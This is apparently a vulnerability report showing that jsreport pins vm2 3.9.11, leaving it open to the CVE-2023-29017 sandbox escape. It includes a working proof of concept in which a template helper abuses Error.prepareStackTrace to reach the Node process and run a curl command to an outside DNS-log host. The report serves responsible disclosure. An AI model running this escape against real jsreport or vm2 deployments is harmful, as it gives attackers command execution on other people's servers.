Description

A few days ago, the vm2 module of nodejs found a sandbox escape vulnerability, which was officially fixed in v3.9.15

However, a fixed vm2 version is hard-coded in the package.json(v 3.9.11) of the jsreport-core component of jsreport, which makes it impossible to install the latest vm2 every time

The relevant details and POC of this sandbox escape are publicly available:

• https://gist.github.com/seongil-wi/2a44e082001b959bfe304b62121fb76d
• https://nvd.nist.gov/vuln/detail/CVE-2023-29017

By testing on the official playground of jsreport, it is found that the vulnerability exists

Proof of Concept

tested on jsreport official playground.
playground workspace(with poc inside):
https://playground.jsreport.net/w/anon/f9agld17

the html content used to generate a pdf

<style>
    th {
        font-size: 20px;
    }
    
    td, th {
        background-color: #abe81b;
        border: 3px solid #455bd0;
        padding: 10px;
        text-align: center;
    }
</style>
<table>
    <tr>
        <th>Name</th>
        <th>Age</th>
        <th>Job</th>
        <th>Random</th>
    </tr>
    {{#each people}}
        <tr>
            <td>{{name}}</td>
            <td>{{age}}</td>
            <td>{{job}}</td>
            <td>{{getRandom}}</td>
        </tr>
    {{/each}}
</table>

the js code which will be called while generating the pdf

function getRandom() {
    Error.prepareStackTrace = (e, frames) => {
    frames.constructor.constructor('return process')().mainModule.require('child_process').execSync('curl http://zf2o8e.dnslog.cn'); 
};
(async ()=>{}).constructor('return process')()
    return Math.random()
}

Click the run button.
Fom the report log on the right, you can see that curl http://zf2o8e.dnslog.cn was executed and a DNS resolution error was thrown.